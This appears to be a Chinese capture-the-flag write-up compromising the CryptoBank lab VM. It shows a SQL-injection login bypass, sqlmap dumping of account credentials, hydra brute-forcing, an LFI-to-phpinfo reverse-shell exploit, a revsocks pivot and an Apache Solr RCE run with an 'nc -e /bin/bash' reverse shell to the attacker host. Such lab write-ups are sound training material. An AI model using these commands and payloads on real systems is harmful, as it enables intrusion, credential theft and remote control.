导航菜单

CryptoBank靶机渗透测试插图

 

靶机下载地址及配置

cryptobank靶机下载地址cryptobank靶机IP: 192.168.56.132(cryptobank.local)kali攻击机IP: 192.168.56.116

 

知识点及工具

nmapsqlmapdirbsql注入代理apache solr RCE

 

实战渗透

首先第一步对目标靶机IP进行网络端口服务扫描

nmap -A -p- 192.168.56.132

CryptoBank靶机渗透测试插图(1) 扫描结果显示目标端口开放了22(ssh),80(http)端口,访问80web服务http://192.168.56.132 CryptoBank靶机渗透测试插图(2) 点击访问其他得链接发现解析不了需添加hosts,界面暂无发现好东西,对目录进行了扫描,可以看见有development(http登录),info.php(phpinfo信息),trade(登录界面) CryptoBank靶机渗透测试插图(3) 接下来就转向了trade登录界面,使用常见用户名admin,root,test尝试登录看看是否为弱口令,登录出错提示信息”Login Failed! Wrong username or password” CryptoBank靶机渗透测试插图(4) 突然有想法尝试万能密码了 binggo 登录成功 ‘or’=’or’ CryptoBank靶机渗透测试插图(5) CryptoBank靶机渗透测试插图(6) 登录成功后我也没发现什么其他的,还是sql注入。用sqlmap跑一跑用户名跟密码吧,后面肯定是要用到账号的。先抓取登录的包

POST /trade/login_auth.php HTTP/1.1
Host: cryptobank.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://cryptobank.local/trade/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Connection: close
Cookie: PHPSESSID=po43jcjcj6f8edvsp8qrjvltdj
Upgrade-Insecure-Requests: 1
user=admin&pass=admin&login=Login

接下来sqlmap直接开干

sqlmap -u "http://cryptobank.local/trade/login_auth.php" --data="login=Login&pass=admin&user=admin" -p pass --random-agent --dbs

CryptoBank靶机渗透测试插图(7) 可以看到靶机存在5张表,数据库类型为mysql由于靶机标题为cryptobank所有要用到的表肯定也是cryptobank表,爆爆爆

sqlmap -u "http://cryptobank.local/trade/login_auth.php" --data="login=Login&pass=admin&user=admin" -p pass --random-agent --dbms=mysql -D cryptobank --tables

CryptoBank靶机渗透测试插图(8)

此用户账号在acccounts里,列出列名

sqlmap -u "http://cryptobank.local/trade/login_auth.php" --data="login=Login&pass=admin&user=admin" -p pass --random-agent --dbms=mysql -D cryptobank -T accounts --dump

CryptoBank靶机渗透测试插图(9) 得到了这么多账号密码,随便拿一个可以直接登录拿着这些密码,ssh爆破一番没有结果,接下来转向了develpoment目录访问登录提示需要开发人员登录,对这个develpoment目录用这些账号密码也尝试了一次,发现开发人员的账户不在这个里面,须再找 CryptoBank靶机渗透测试插图(10)

在首页看见了一个团队各员工的职位,看到了development人员 CryptoBank靶机渗透测试插图(11) 点击邮件按钮,发现一个疑似用户名,猜测julius.b/juliusbook为用户名 CryptoBank靶机渗透测试插图(12) 然后添加到用户字典中,再次进行爆破

hydra -L bankuser.txt -P bankpassword.txt -f cryptobank.local http-get /develpoment

CryptoBank靶机渗透测试插图(13) 账号密码登录之后就看到一句话only for develpoment,没其他的了吗,我还不信,好不容易找到账号密码登录 CryptoBank靶机渗透测试插图(14) 再次对目录扫描一遍,这个扫描需要登录之后有身份验证才能扫描出来,再次进行抓包拿到验证身份,使用dirbuster扫描,添加headers CryptoBank靶机渗透测试插图(15) 扫描到了一个tools目录 CryptoBank靶机渗透测试插图(16) 访问之后,有三个功能(代码执行,系统文件,文件上传) CryptoBank靶机渗透测试插图(17) 第一个看见文件上传了 心理有点小激动,点击打开了,我直接上传php,发现被防火墙拦截了,只能上传png文件,尝试绕过了一些方法,但是没有绕过去,TCL CryptoBank靶机渗透测试插图(18) 命令执行那个有个登录,就没搞了,点开系统文件的,发现地址栏有file=谁谁谁,想到LFI本地文件包含http://cryptobank.local/development/tools/FileInclusion/pages/fetchmeafile.php?file=file.txt CryptoBank靶机渗透测试插图(19) /etc/password,/etc/hosts等都被墙了,但是他能读到具体的某些文件/vr/www/cryptobank/info.php CryptoBank靶机渗透测试插图(20) 管他墙不墙的了,正好这个phpinfo可以想起LFI-phpinfo利用,https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf

github搜索找到了一个RCE修改一下配置参数,这里记得加上身份认证,我当时没加弄得我作死了很久

$ip = '192.168.56.116';
REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1r
LFIREQ="""GET /development/tools/FileInclusion/pages/fetchmeafile.php?file=%s HTTP/1.1r
添加 Authorization: Basic anVsaXVzLmI6d0pXbTRDZ1YyNg==

CryptoBank靶机渗透测试插图(21) 然后直接利用,可以看到成功反弹shell CryptoBank靶机渗透测试插图(22) 读取cryptobank用户下的flag.txt CryptoBank靶机渗透测试插图(23) 接下来就是提权为某用户身份了,上传一个LinEnum.sh脚本让他自己跑一下,在开放端口处发现一个地址开放了一个8983的端口,猜测应该是solr CryptoBank靶机渗透测试插图(24) 因为不是本地的,看着像是docker的,所以现在给代理出来,这里代理我用了这个revsocks工具,可以根据自己系统下载对应版本在kali开启监听

./revsocks_linux_amd64 -listen :8088 -socks 0.0.0.0:1080 -pass cryptobank

CryptoBank靶机渗透测试插图(25) 在靶机执行

./revsocks_linux_amd64 -connect 192.168.56.116:8088 -pass cryptobank

CryptoBank靶机渗透测试插图(26)

代理已经开启,接下来就要在浏览器或者proxychain设置一下才能用哦火狐浏览器代理配置 CryptoBank靶机渗透测试插图(27) proxychain配置 CryptoBank靶机渗透测试插图(28) 浏览器访问地址,没想到还真是solr http://172.17.0.1:8983/ CryptoBank靶机渗透测试插图(29) 二话没说,去年有个模板远程代码执行,听说win的有个0day哟,嘿嘿

proxychains python solr_rce.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.56.116 1234"

CryptoBank靶机渗透测试插图(30) 已成功利用,输入id查看身份,可sudo哟,还真的免密登录。 CryptoBank靶机渗透测试插图(31) 最后靶机就完成了,哦耶

本文由安全客原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/203923

相关推荐

WAF Bypass之xerces解析

  JAVA的XML解析,底层用的是xerces,而xml本身的特性及xerces的一些特性,可以用来造成WAF与后台...

CVE-2020-11996:Apache Tomcat HTTP/2 拒绝服务攻击漏洞通告

  0x01 漏洞背景 2020年06月29日, 360CERT监测发现 apache 官方 发布了 Tomcat http/2 拒绝服务攻...